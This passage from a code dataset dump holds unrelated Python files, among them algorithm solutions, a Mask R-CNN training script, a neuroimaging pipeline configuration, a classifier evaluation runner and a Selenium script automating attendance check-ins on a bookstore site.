Caching/draw_blog_own_caching.py","file_name":"draw_blog_own_caching.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"63277996","text":"#\n# @lc app=leetcode id=714 lang=python3\n#\n# [714] Best Time to Buy and Sell Stock with Transaction Fee\n#\n# https://leetcode.com/problems/best-time-to-buy-and-sell-stock-with-transaction-fee/description/\n#\n# algorithms\n# Medium (58.35%)\n# Total Accepted: 114.2K\n# Total Submissions: 195.2K\n# Testcase Example: '[1,3,2,8,4,9]\\n2'\n#\n# You are given an array prices where prices[i] is the price of a given stock\n# on the i^th day, and an integer fee representing a transaction fee.\n# \n# Find the maximum profit you can achieve. You may complete as many\n# transactions as you like, but you need to pay the transaction fee for each\n# transaction.\n# \n# Note: You may not engage in multiple transactions simultaneously (i.e., you\n# must sell the stock before you buy again).\n# \n# \n# Example 1:\n# \n# \n# Input: prices = [1,3,2,8,4,9], fee = 2\n# Output: 8\n# Explanation: The maximum profit can be achieved by:\n# - Buying at prices[0] = 1\n# - Selling at prices[3] = 8\n# - Buying at prices[4] = 4\n# - Selling at prices[5] = 9\n# The total profit is ((8 - 1) - 2) + ((9 - 4) - 2) = 8.\n# \n# \n# Example 2:\n# \n# \n# Input: prices = [1,3,7,5,10,3], fee = 3\n# Output: 6\n# \n# \n# \n# Constraints:\n# \n# \n# 1 <= prices.length <= 5 * 10^4\n# 1 <= prices[i] < 5 * 10^4\n# 0 <= fee < 5 * 10^4\n# \n# \n#\n\nfrom typing import List\n\nclass Solution:\n def maxProfit(self, prices: List[int], fee: int) -> int:\n # a means the cash\n # b means the cash - price[i]. It is the same as max_{i < j} cash[i] - price[i]\n\n a = [0]\n b = [-prices[0]]\n for i in range(1, len(prices)):\n a.append(max(a[i - 1], b[i - 1] + prices[i] - fee))\n b.append(max(b[i - 1], a[i - 1] - prices[i]))\n return a[len(prices) - 1]\n","sub_path":"python/714.best-time-to-buy-and-sell-stock-with-transaction-fee.py","file_name":"714.best-time-to-buy-and-sell-stock-with-transaction-fee.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"374924759","text":"import os\nimport sys\nimport random\nimport math\nimport re\nimport time\nimport numpy as np\nimport cv2\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# Root directory of the project\nROOT_DIR = os.path.curdir\n\n# Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\nfrom mrcnn.model import log\n\nimport skimage.io\nfrom skimage import measure\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n# Local path to trained weights file\nCOCO_MODEL_PATH = os.path.join(ROOT_DIR, \"models/mask_rcnn_coco.h5\")\n# Download COCO trained weights from Releases if needed\nif not os.path.exists(COCO_MODEL_PATH):\n utils.download_trained_weights(COCO_MODEL_PATH)\n\n# Dataset Dir\nDATASET_DIR = \"/home/zhaiyu/Dataset/CMP_facade_DB_base\"\n\n# Configurations\n\n\nclass FacadeConfig(Config):\n \"\"\"Configuration for training on the toy facade dataset.\n Derives from the base Config class and overrides values specific\n to the toy shapes dataset.\n \"\"\"\n # Give the configuration a recognizable name\n NAME = \"facade\"\n\n # Train on 1 GPU and 8 images per GPU. We can put multiple images on each\n # GPU because the images are small. Batch size is 8 (GPUs * images/GPU).\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n # Number of classes (including background)\n NUM_CLASSES = 1 + 12 # background + 11 facade types\n\n IMAGE_MIN_DIM = 512\n IMAGE_MAX_DIM = 512\n\n STEPS_PER_EPOCH = 200\n\n\nconfig = FacadeConfig()\nconfig.display()\n\n\nclass FacadeDataset(utils.Dataset):\n \"\"\"Generates the facade dataset.\n \"\"\"\n\n def load_facades(self, dataset_dir, subset):\n \"\"\"Load a subset of the Facade dataset.\n dataset_dir: Root directory of the dataset.\n subset: Subset to load: train or val\n \"\"\"\n # Add classes\n self.add_class(\"facade\", 1, \"1\")\n self.add_class(\"facade\", 2, \"2\")\n self.add_class(\"facade\", 3, \"3\")\n self.add_class(\"facade\", 4, \"4\")\n self.add_class(\"facade\", 5, \"5\")\n self.add_class(\"facade\", 6, \"6\")\n self.add_class(\"facade\", 7, \"7\")\n self.add_class(\"facade\", 8, \"8\")\n self.add_class(\"facade\", 9, \"9\")\n self.add_class(\"facade\", 10, \"10\")\n self.add_class(\"facade\", 11, \"11\")\n self.add_class(\"facade\", 12, \"12\")\n\n assert subset in [\"train\", \"val\"]\n dataset_dir = os.path.join(dataset_dir, subset)\n\n image_dir = os.path.join(dataset_dir, \"images\")\n mask_dir = os.path.join(dataset_dir, \"masks\")\n image_names = os.listdir(image_dir)\n\n for image_name in image_names:\n self.add_image(\"facade\",\n image_id=image_name,\n path=os.path.join(image_dir, image_name),\n mask_path=os.path.join(mask_dir, image_name[:-4] + \".png\"))\n\n # def load_image(self, image_id):\n # \"\"\"Generate an image from the specs of the given image ID.\n # Typically this function loads the image from a file\n # \"\"\"\n # info = self.image_info[image_id]\n # image = skimage.io.imread(info[\"path\"], plugin='pil')\n # return image\n\n def load_mask(self, image_id):\n \"\"\"Generate instance masks given image ID.\n \"\"\"\n # If not a ship dataset image, delegate to parent class.\n image_info = self.image_info[image_id]\n if image_info[\"source\"] != \"facade\":\n return super(self.__class__, self).load_mask(image_id)\n\n info = self.image_info[image_id]\n mask_path = info[\"mask_path\"]\n\n mask = (skimage.io.imread(mask_path, as_gray=True, plugin=\"pil\") * 255).astype(np.uint8)\n\n # First detect how many little masks inside the image\n labels = measure.label(mask)\n masks_this_image = []\n class_ids = []\n for ch in range(1, np.max(labels) + 1):\n this_channel = (np.where(labels == ch, True, False))\n masks_this_image.append(this_channel)\n color_value = (np.max(mask * this_channel))\n if color_value == 12:\n class_id = 1\n elif color_value == 18:\n class_id = 2\n elif color_value == 36:\n class_id = 3\n elif color_value == 54:\n class_id = 4\n elif color_value == 79:\n class_id = 5\n elif color_value == 114:\n class_id = 6\n elif color_value == 140:\n class_id = 7\n elif color_value == 175:\n class_id = 8\n elif color_value == 200:\n class_id = 9\n elif color_value == 212:\n class_id = 10\n elif color_value == 224:\n class_id = 11\n elif color_value == 236:\n class_id = 12\n else:\n class_id = 1\n print(\"This color_value = {}\".format(color_value))\n print(\"Shit happened! class_id == 1\")\n return\n class_ids.append(class_id)\n\n masks_this_image = np.array(masks_this_image)\n # concatenated_masks = np.transpose(np.transpose(concatenated_masks, (2, 1, 0)), (1, 0, 2))\n if len(masks_this_image) == 0:\n print(\"No object mask here!\")\n concatenated_masks = np.zeros((512, 512, 0))\n else:\n concatenated_masks = np.transpose(masks_this_image, (1, 2, 0))\n # class_ids = np.ones([np.max(labels)], dtype=np.int32)\n class_ids = np.array(class_ids, dtype=np.int32)\n return concatenated_masks.astype(np.bool), class_ids\n\n def load_image(self, image_id):\n \"\"\"Load the specified image and return a [H,W,3] Numpy array.\n \"\"\"\n # Load image\n image = skimage.io.imread(self.image_info[image_id]['path'])\n # If grayscale. Convert to RGB for consistency.\n if image.ndim != 3:\n image = skimage.color.gray2rgb(image)\n # If has an alpha channel, remove it for consistency\n if image.shape[-1] == 4:\n image = image[..., :3]\n return image\n\n\n# Training dataset\ndataset_train = FacadeDataset()\ndataset_train.load_facades(DATASET_DIR, \"train\")\ndataset_train.prepare()\n\n# Validation dataset\ndataset_val = FacadeDataset()\ndataset_val.load_facades(DATASET_DIR, \"val\")\ndataset_val.prepare()\n\n# Create model in training mode\nmodel = modellib.MaskRCNN(mode=\"training\", config=config,\n model_dir=MODEL_DIR)\n\n\n# Which weights to start with\ninit_with = \"last\"\n\nif init_with == \"imagenet\":\n model.load_weights(model.get_imagenet_weights(), by_name=True)\n\nelif init_with == \"coco\":\n # Load weights trained on MS COCO, but skip layers that\n # are different due to the different number of classes\n # See README for instructions to download the COCO weights\n model.load_weights(COCO_MODEL_PATH, by_name=True,\n exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n \"mrcnn_bbox\", \"mrcnn_mask\"])\nelif init_with == \"last\":\n # Load the last model you trained and continue training\n model.load_weights(model.find_last(), by_name=True)\n\n# Train the head branches\n# Passing layers=\"heads\" freezes all layers except the head\n# layers. You can also pass a regular expression to select\n# which layers to train by name pattern.\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE,\n epochs=1,\n layers='heads')\n\n# Fine tune all layers\n# Passing layers=\"all\" trains all layers. You can also\n# pass a regular expression to select which layers to\n# train by name pattern.\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE / 10,\n epochs=15, # used to be 2\n layers=\"all\")\n\n","sub_path":"train_facade.py","file_name":"train_facade.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"174862574","text":"import os\nimport commands\n\n\"\"\"\n=================\nComputer Settings\n=================\n\"\"\"\n# True = Run on compute cluster\n# False = Run on local machine\nrunOnGrid = False\n\n# Number of subjects to run simultaneously\n# This number depends on computing resources\n# Only applies when running on a local machine with multiple cores\nnumSubjectsAtOnce = 5\n\n# Number of cores (local) or slots on a node (cluster) per subject\n# Slots are cores on a cluster node\n# This number depends on computing resources\n# Only applies when local machine has multiple cores or runOnGrid = True\nnumCoresPerSubject = 2\n\n# Options are 'SGE' (Sun Grid Engine) or 'PBS' (Portable Batch System)\n# Only applies when runOnGrid = True\nresourceManager = 'SGE'\n\nqueue = 'all.q'\n\n\n#options for SGE only here,\n#SGE users must set this enviroment,\n#easy way to know your parallel environment is to execute the following on command on cluster\n# $ qconf -spl\n\n#A pipeline for each subject that needs preprocessing is spawned on single nodes of the cluster.\n# To avoid I/O overhead the pipeline should only use the resources(cores) from that node.\n# The users can enable this feature on Sun Grid Engine by modifying their parallel environment\n# or adding a new parallel ennviroment using the exisiting environment parameters(some parameters tweaked)\n\n#To create new environment using old environment follow ths procedure\n\n# 1. find the parallel environments u have on cluster\n# $ qconf -spl\n\n# 2. look through your parallel environments. Mine looks like this\n\n#$ qconf -sp mpi\n# pe_name mpi\n# slots 999\n# user_lists NONE\n# xuser_lists NONE\n# start_proc_args NONE\n# stop_proc_args NONE\n# ---># allocation_rule $fill_up\n# control_slaves TRUE\n# job_is_first_task FALSE\n# urgency_slots min\n# accounting_summary TRUE\n\n# 3. use old to create new environment\n# $ qconf -sp mpi > cpac_mpi \n\n# 4. change the allocation_rule highlighted with the arrow to $pe_slots,\n# use your favourite text editor to accomplish this\n\n# 5. Add your new envionment file to SGE \n\n# qconf -Ap cpac_mpi\n\n# 6. Specify this new environment below\nparallelEnvironment = 'mpi'\n\n\"\"\"\n====================\nData Directory Setup ***\n====================\n\"\"\"\n# NOTE: Users must manually create these directories before running C-PAC\n\n# Directory where C-PAC should store temporary and intermediate files\nworkingDirectory = '/home/bcheung/yard_sale/p_work'\n\n# Directory where C-PAC should place crash logs\ncrashLogDirectory = '/home/bcheung/yard_sale/p_crash'\n\n# Directory where C-PAC should put processed data\nsinkDirectory = '/home/bcheung/yard_sale/p_sink'\n\n\"\"\"\n========================\nResolution and Smoothing ***\n========================\n\"\"\"\n# Set the resolution (in mm) to which images are transformed\n# Transformation occurs during registration and is requried for many measures\nstandardResolution = '3mm'\n\n# Width (FWHM, in mm) of the Gaussian kernel used for spatial smoothing\n# To skip smoothing, set to 0\nfwhm = [4]\n\n\"\"\"\n========================\nResource Directory Setup NOT FINISHED- NEED MORE INFO FOR FSL FILES\n========================\n\"\"\"\n# Directory where FSL is located\n# If you have added FSL to your .bashrc file, this will be set automatically\nFSLDIR = commands.getoutput('echo $FSLDIR')\n\n# The following options specify the path of various resources provided by FSL\n# By default, C-PAC will automatically locate these files based on FSLDIR\n# Most users will not need to modify these values\n\n# For users wishing to use non-standard versions of these resources:\n## 1) Delete the string in parentheses beginning with FSLDIR\n## 2) Replace this value with the full path to the appropriate file\n\nstandardResolutionBrain = os.path.join(FSLDIR,'data/standard/MNI152_T1_%s_brain.nii.gz' % (standardResolution))\n\nstandard = os.path.join(FSLDIR,'data/standard/MNI152_T1_%s.nii.gz' % (standardResolution))\n\nstandardBrainMaskDiluted = os.path.join(FSLDIR,'/data/standard/MNI152_T1_%s_brain_mask_dil.nii.gz' % (standardResolution))\n\nconfigFile = os.path.join(FSLDIR,'etc/flirtsch/T1_2_MNI152_%s.cnf' % (standardResolution))\n\nbrainSymmetric = os.path.join(FSLDIR,'data/standard/MNI152_T1_2mm_brain_symmetric.nii.gz')\n\nsymmStandard = os.path.join(FSLDIR,'data/standard/MNI152_T1_2mm_symmetric.nii.gz')\n\ntwommBrainMaskDiluted = os.path.join(FSLDIR,'data/standard/MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz')\n\nconfigFileTwomm = os.path.join(FSLDIR,'etc/flirtsch/T1_2_MNI152_2mm.cnf')\n\nidentityMatrix = os.path.join(FSLDIR,'etc/flirtsch/ident.mat')\n\nharvardOxfordMask = os.path.join(FSLDIR,'data/atlases/HarvardOxford/HarvardOxford-sub-maxprob-thr25-2mm.nii.gz')\n\nboundaryBasedRegistrationSchedule = os.path.join(FSLDIR, 'etc/flirtsch/bbr.sch')\n\"\"\"\n=============================\nOptional Timeseries Overrides ***\n=============================\n\"\"\"\n# Ignore volumes before this timepoint\n# Options are an integer or None (defaults to beginning of timeseries)\nstartIdx = 0\n\n# Ignore volumes after this timepoint\n# Options are an integer or None (defaults to end of timeseries)\nstopIdx = None\n\n# Specify a TR other than what is listen in image headers\n# Options are an integer or None (defaults to header information)\nTR = None\n\n\"\"\"\n================================\nPreprocessing Workflow Selection ***\n================================\n\"\"\"\n# Set which preprocessing workflows to run.\n\n# WARNING:\n# Many measures and outputs require that these workflows be run.\n# Please refer to the developer documentation before changing these settings.\n# Options (here and for most other settings) are: 1 = run, 0 = skip\n\nrunAnatomicalDataGathering = [1]\n\nrunFunctionalDataGathering = [1]\n\nrunAnatomicalPreprocessing = [1]\n\nrunFunctionalPreprocessing = [1]\n\nrunRegistrationPreprocessing = [1]\n\nrunBoundaryBasedRegistration = [1]\n\nrunRegisterFuncToMNI = [1]\n\nrunAnatomicalToFunctionalRegistration = [1]\n\nrunSymbolicLinks = [0]\n\n\"\"\"\n=========================================\nProbabilistic Tissue Segmentation Options *** NEED TO FIX PRIOR PATH\n=========================================\n\"\"\"\n# Run automatic tissue segmentation\nrunSegmentationPreprocessing = [1]\n\n# C-PAC uses FSL to automatically distinguish tissue types based on priors.\n# Each prior represents the probability that a given voxel will be \n# of a particular tissue type (white matter, gray matter, or CSF).\n\n# Please specify the location and name of your prior files.\n# Priors distributed with FSL must be binarized to be used by C-PAC\n# For information about how to do this, please see the User Guide\nprior_path = '/home2/data/Projects/C-PAC/tissuepriors/%s' % standardResolution\n\n# These values will be set automatically based on prior_path\nPRIOR_CSF = os.path.join(prior_path, 'avg152T1_csf_bin.nii.gz')\nPRIOR_GRAY = os.path.join(prior_path, 'avg152T1_gray_bin.nii.gz')\nPRIOR_WHITE = os.path.join(prior_path, 'avg152T1_white_bin.nii.gz')\n\n# Set thresholds for use during automatic tissue segmentation.\n# Values correspond to probability thresholds for a given tissue type.\n# For example, setting a value of 0.8 will result in areas with a 80 percent \n# probability of being a particular tissue type to be classified as such\n\ncerebralSpinalFluidThreshold = [0.98]\n\nwhiteMatterThreshold = [0.98]\n\ngrayMatterThreshold = [0.7]\n\n\"\"\"\n==================================\nNusiance Signal Correction Options *** \n==================================\n\"\"\"\n# Run nuisance signal correction\nrunNuisance = [1]\n\n# Select which nuisance signal corrections to apply:\n## compcor = CompCor\n## wm = White Matter \n## csf = CSF\n## gm = Gray Matter\n## global = Global Mean Signal\n## pc1 = First Principle Component\n## motion = Motion\n## linear = Linear Trend\n## quadratic = Quadratic Trend\n\n# Options are 1 (apply) or 0 (ignore)\nCorrections = [{'compcor' : 1,\n 'wm' : 1,\n 'csf' : 1,\n 'gm' : 0,\n 'global' : 0,\n 'pc1' : 0,\n 'motion' : 1,\n 'linear' : 1,\n 'quadratic' : 0}]\n\n# Number of Principle Components to calculate for CompCor (usually 5 or 6)\n# Only for use when 'compcor' is set to 1\nnComponents = [5]\n\n# Run median angle correction\nrunMedianAngleCorrection = [0]\n\n# Target angle for median angle correction\ntargetAngleDeg = [90]\n\n# Run Scrubbing\nrunScrubbing = [1]\n\n# Generate FD and DVARS motion statistics\n# Required to run scrubbing, but can also be used as regressors in a GLM\nrunGenerateMotionStatistics = [1]\n\n# Specify maximum acceptable Framewise Displacement (in mm)\n# Any volume with displacement greater than this value will be removed.\n# One volume before and two volumes after each over-threshold volume\n# will also be removed\nscrubbingThreshold = [0.2]\n\n\"\"\"\n==========================\nTemporal Filtering Options ***\n==========================\n\"\"\"\n# Apply Temporal Filtering\nrunFrequencyFiltering = [1]\n\n# First value = Lower bound for a band-pass filter\n# Second value = Upper bound for a band-pass filter\n# To use a high-pass filter, set the second value to NONE\n# To use a low-pass filter, set the first value to NONE\nnuisanceBandpassFreq =[(0.01, 0.1)]\n\n\"\"\"\n=======================================\nSeed-based Correlation Analysis Options ***\n=======================================\n\"\"\"\n# Run Seed-based Correlation Analysis\nrunSCA = [0]\n\n# SCA will be run on all ROI and voxel timeseries extracted below.\n# This means that in order to run SCA, you must also run Timeseries Extraction.\n# Seeds for SCA must be specified in roiDirectoryPath or maskDirectoryPath.\n\n\"\"\"\n==============================\nTimeseries Extraction Options ***\n==============================\n\"\"\"\n# Extract an average timeseries for each ROI\n# Required if you wish to run ROI-based SCA\nrunROITimeseries = [0]\n\n# Export ROI timeseries data\n# First value = Output .csv\n# Second value = Output numPy array\n# Options are True/False\nroiTSOutputs = [True, True]\n\n# Directory containing ROI definitions\nroiDirectoryPath = '/path/to/roi_definitions_directory'\n\n# Extract timeseries data for all individual voxels within a mask\n# Required if you wish to run voxel-based SCA\nrunVoxelTimeseries = [0]\n\n# Export voxel timeseries data\n# First value = Output .csv\n# Second value = Output numPy array\n# Options are True/False\nvoxelTSOutputs = [False, False]\n\n# Directory contaning masks\nmaskDirectoryPath = '/path/to/mask_definitions_directory'\n\n# Register timeseries data to a surface model built by FreeSurfer\n# Required to run vertex timeseries extraction\nrunSurfaceRegistraion = [0]\n\n# Directory where FreeSurfer outputs surface data\n# This should be the same as SUBJECTS_DIR in .bashrc\nreconSubjectsDirectory = '/path/to/fs_output_directory'\n\n# Extract timeseries data for surface vertices\nrunVerticesTimeSeries = [0]\n\n# Export vertex timeseries data\n# First value = Output .csv\n# Second value = Output numPy array\n# Options are True/False\nverticesTSOutputs = [False, False]\n\nstartIdx = 0\nstopIdx = None\n\n\nTR = None\nsliceTimingCorrection = False\n\n\"\"\"\n===================================\nRegional Homogeneity (ReHo) Options ***\n===================================\n\"\"\"\n# Calculate Regional Homogeneity\nrunReHo = [0]\n\n# Cluster size (number of neighboring voxels)\n# Options are 7, 19, and 27\nclusterSize = 27\n\n\"\"\"\n==========================\nNetwork Centrality Options ***\n==========================\n\"\"\"\n# Calculate network centrality measures\nrunNetworkCentrality = [0]\n\n# Select which centrality measures to calculate\n# First value = Degree Centrality \n# Second value = Eigenvector Centrality\n# Options are True/False\ncentralityMethodOptions = [True, True]\n\n# Specify how connections are defined during graph construction\n# First value = Binarized (connection strenth is either 0 or 1)\n# Second value = Weighted (connection strength is a correlation value)\n# Options are True/False\ncentralityWeightOptions = [True, True]\n\n# Select what type of threshold is applied to create an adjacency matrix\n# 0 = Significance threshold (P-value)\n# 1 = Sparsity threshold (Sparsity value)\n# 2 = Correlation threshold (Pearson's r)\ncorrelationThresholdOption = 1\n\n# Based on the type of threshold selected above, enter the appropriate value\n# Significance threshold = P-value\n# Sparsity threshold = sparsity value\n# Correlation threshold = Pearsons' r value\n# examples: 0.05, 0.0744, 0.6\ncorrelationThreshold = 0.0744\n\n# Directory containing ROI definitions or masks\n# Using ROIs will result in node-based centrality measures\n# Using a mask will result in voxel-based centrality measures\ntemplateDirectoryPath = '/path/to/centrality_mask_roi_directory' \n\n\"\"\"\n============================================\nVoxel-mirrored Homotopic Connectivity (VMHC) ***\n============================================\n\"\"\"\n# Calculate VMHC for all gray matter voxels\nrunVMHC = [0]\n\n# There are no options for VMHC\n\n\"\"\"\n====================================================\nBootstrap Analysis of Stable Clusters (BASC) Options **\n====================================================\n\"\"\"\n# Path to a mask file. Voxels outside this mask will be excluded from BASC.\nbascROIFile = '/path/to/basc_mask_file'\n\n# Number of clusters at both the individual and group level.\nbascClusters = 6\n\n# Number of bootstraps to apply to original timeseries data.\nbascTimeseriesBootstraps = 100\n\n# Number of bootstraps to apply to individual stability matrices.\nbascDatasetBootstraps = 100\n\n# Path to a text file containing Affinity Thresholds for each subject.\n# These are correlation thresholds applied prior to spectral clustering.\n# Can be subject specific when subjects have differing numbers of timepoints.\n# Subjects should be in the same order as in the main subject list.\nbascAffinityThresholdFile = '/path/to/basc_affinity_threshold_file'\n\n\"\"\"\n================================================\nConnectome-wide Association Study (CWAS) Options **\n================================================\n\"\"\"\n# Path to a mask file. Voxels outside this mask will be excluded from CWAS.\ncwasROIFile = '/path/to/cwas_mask_file'\n\n# Number of permutation tests to run on the Psuedo-F statistic\ncwasFSamples = 5000\n\n# Number of NiPype nodes to be created while computing CWAS.\n# This number depends on computing resources\ncwasParallelNodes = 10\n\n# Path to a text file containing phenotypic regressor.\ncwasRegressorFile = '/path/to/cwas_regressor_file'\n\n\"\"\"\n==========================================================================\nAmplitude of Low Frequency Oscillations (ALFF) and fractional ALFF Options ***\n==========================================================================\n\"\"\"\n# Calculate ALFF and fALFF\nrunALFF = [0]\n\n# NOTE: Frequency filtering is not applied when calculating fALFF\n\n# Frequency cutoff (in Hz) for a high-pass filter\nhighPassFreqALFF = [0.01]\n\n# Frequency cutoff (in Hz) for a low-pass filter\nlowPassFreqALFF = [0.1]\n \n\"\"\"\n============================\nGroup Statistics Options ***\n============================\n\"\"\"\n# Path to list of subjects on which to run group statistics\n# This file should be created automatically when you run extract_data.py\n# The order of subjects in this list must match the order in your model\ngroupAnalysisSubjectList = '/path/to/subject_list_group_analysis.txt'\n\n# Select which measures should be included in group analysis:\n## sca_seed_Z_to_standard_smooth = voxel-based SCA\n## sca_roi_Z_to_standard_smooth = ROI based SCA\n## alff_Z_to_standard_smooth = ALFF\n## falff_Z_to_standard_smooth = fALFF\n## vmhc_z_score_stat_map = VMHC\n## reho_Z_to_standard_smooth = ReHo\nderivativeList = ['sca_seed_Z_to_standard_smooth', \\\n 'sca_roi_Z_to_standard_smooth', \\\n 'alff_Z_to_standard_smooth', \\\n 'falff_Z_to_standard_smooth', \\\n 'vmhc_z_score_stat_map', \\\n 'reho_Z_to_standard_smooth']\n\n# Location of a text file contaning a list of FSL models\n# Each line in this file should be the path to a model directory\n# Each model directory should contain a .mat, .con, and .grp file\n# If fTest = True (see below), model directories must also contain a .fts file\n# These models can be generated through FSL, or using create_fsl_model.py\n# For instructions on using create_fsl_model.py, see the user guide\nmodelFile = '/path/to/subject_list_model_list.txt'\n\n# If a subjecs has multiple scans:\n# False = Consdier only the first scan session during group analysis\n# True = Consider all scan sessions\nmixedScanAnalysis = False\n\nzThreshold = 2.3\n\npThreshold = 0.05\n\n# Run an F-test\n# Options are True/False\nfTest = True\n\n","sub_path":"CPAC/pipeline/config_fctest.py","file_name":"config_fctest.py","file_ext":"py","file_size_in_byte":16487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"470343631","text":"# my_impl.py\nimport pandas as pd\nimport sys\n\nfrom project.c45 import C45\nfrom sklearn.model_selection import train_test_split\n\n\ndef run_classifier(df):\n \"\"\"\n Run calculate_results 10 times and print the results\n \"\"\"\n try:\n X = df.drop(df.columns[len(df.columns) - 1], axis=1)\n y = df.iloc[:, len(df.columns) - 1]\n\n except:\n sys.exit(\"There was a problem processing the file\")\n\n results = []\n # This will run train_test_split 10 times\n for i in range(10):\n results.append(calculate_results(i, X, y))\n\n accuracies = []\n for result in results:\n accuracies.append(sum(result['score']) / len(result['predicted']))\n\n return accuracies\n\n\ndef calculate_results(i, X, y):\n \"\"\"\n Use train_test_split from scikit to shuffle and split the data\n into training and test.\n \"\"\"\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)\n classifier = C45()\n classifier.fit(X_train, y_train)\n predicted = classifier.predict(X_test)\n\n actual = y_test.tolist()\n score = []\n for pred, corr in zip(predicted, actual):\n score.append(1) if pred == corr else score.append(0)\n\n results = {'actual': actual, 'predicted': predicted, 'score': score}\n export_results(i, results)\n return results\n\n\ndef export_results(i, results):\n \"\"\"\n Print each of the 10 runs to csv files\n \"\"\"\n filepath = 'data/results/predictions{0}.csv'.format(i + 1)\n df = pd.DataFrame(results)\n df.to_csv(filepath)\n","sub_path":"project/my_impl.py","file_name":"my_impl.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"447821196","text":"# BOJ 2193 이친수\n# DP\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\ndp = [0]*91\ndp[1], dp[2] = 1, 1\nfor i in range(3, 91):\n dp[i] = dp[i-1] + dp[i-2]\nprint(dp[N])\n","sub_path":"solved/Silver3/이친수.py","file_name":"이친수.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"175258416","text":"#-*- coding: utf-8 -*-\n\nimport time\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.common.exceptions import NoAlertPresentException\n\n\"\"\"\n0.준비물\npython 설치\nFirefox 설치 및 해당 버전에 맞는 geckodriver 다운로드\nC드라이브에 'kyobo' 폴더 생성\ngeckodriver.exe와 kyobo.py를 C:/kyobo 로 이동\n[cmd]\npip install bs4\npip install selenium\n\n1.실행방법\nkyobo_id와 kyobo_pw에 id, pw 작성 및 저장\n[cmd]\ncd /kyobo\npython kyobo.py\n\"\"\"\n############### Add Information ###############\nkyobo_id = ''\nkyobo_pw = ''\ndriver_path = ''\n###############################################\n\nprint('교보문고 자동 출석 시작')\nprint('id : ' + kyobo_id)\n\n# kyobo accept\noptions = Options()\noptions.headless = True\nbrowser = Firefox(options=options, executable_path=driver_path)\nbrowser.get('http://www.kyobobook.co.kr/index.laf')\nprint('kyobobook.co.kr 접속')\n\n# 첫 화면 popup 우회\n# print(browser.window_handles)\nbrowser.switch_to.window(browser.window_handles[0])\nprint('popup 우회')\n\n# login\nbrowser.find_elements_by_css_selector('#gnbLoginInfoList > li')[0].click()\nbrowser.find_element_by_id('memid').send_keys(kyobo_id)\nbrowser.find_element_by_id('pw').send_keys(kyobo_pw)\nbrowser.find_element_by_class_name('btn_submit').click()\nprint('login')\n\n# 로그인 후 popup 우회\nbrowser.switch_to.window(browser.window_handles[0])\ntime.sleep(1)\nbrowser.find_elements_by_css_selector('#gnbLoginInfoList > li')[2].click()\n\n# 처음 출석 시 alert : enter\ntry:\n browser.switch_to.alert.accept()\n print('check')\nexcept NoAlertPresentException:\n print('aleady check')\n\ntime.sleep(1)\n# 문장수집 클릭\nif browser.find_elements_by_css_selector('.list_books_kp > li:nth-child(2)'):\n browser.find_elements_by_css_selector('.list_books_kp > li:nth-child(2)')[0].click()\n browser.find_elements_by_css_selector('.btn_stamp_check')[0].click()\n print('문장수집')\n\n\ntry:\n browser.switch_to.alert.accept()\n print('문장수집 정답')\nexcept NoAlertPresentException:\n print('문장수집 끝')\n\ntime.sleep(1)\nhtml_source = browser.page_source\n\n# 현재 출석 일수\nsoup = BeautifulSoup(html_source, 'html.parser')\nul = soup.select('.daily_stamp_list')\nchecked_day = ul[0].select('.on')+ul[0].select('.complete')\n\nfor day in checked_day:\n print(day.text)\n\n# 전체 출석했다면, 2000원 교환권 응모\nif len(ul) == len(checked_day):\n print('all check!')\n browser.find_element_by_css_selector('.benefits_stamp>li:last-child').click()\n\n# popup부터 차례로 close\ncnt = len(browser.window_handles)\nfor i in range(cnt, 0, -1):\n browser.switch_to.window(browser.window_handles[i-1])\n browser.close()\n time.sleep(0.5)\nprint('총', str(len(checked_day)), '일 출석했습니다.')\n\n# 메모리에 남은 driver 삭제\nbrowser.quit()\n","sub_path":"Workspaces09_Python/Python02/crawling/kyobo/kyobo.py","file_name":"kyobo.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"129400218","text":"import math\nfrom typing import Tuple\n\nfrom hypothesis import assume, given\nfrom hypothesis.strategies import floats, tuples\n\nfrom utilities.scalers import apply_deadzone, map_exponential, scale_value\n\n\n@given(value=floats(-1, 1), threshold=floats(0, 1, exclude_max=True))\ndef test_deadzone(value, threshold):\n result = apply_deadzone(value, threshold)\n assert abs(result) <= 1\n if value == 0:\n assert result == 0\n elif not math.isclose(value, 0, abs_tol=threshold):\n assert math.copysign(1, result) == math.copysign(1, value)\n\n\n@given(value=floats(-1, 1), base=floats(1, exclude_min=True, allow_infinity=False))\ndef test_exponential(value, base):\n result = map_exponential(value, base)\n assert abs(result) <= 1\n if value == 0:\n assert result == 0\n else:\n assert math.copysign(1, result) == math.copysign(1, value)\n\n\nreal_halves = floats(allow_nan=False, allow_infinity=False, width=16)\n\n\n@given(\n value=real_halves,\n input_range=tuples(real_halves, real_halves).filter(lambda x: x[0] != x[1]),\n output_range=tuples(real_halves, real_halves)\n .map(sorted)\n .filter(lambda x: 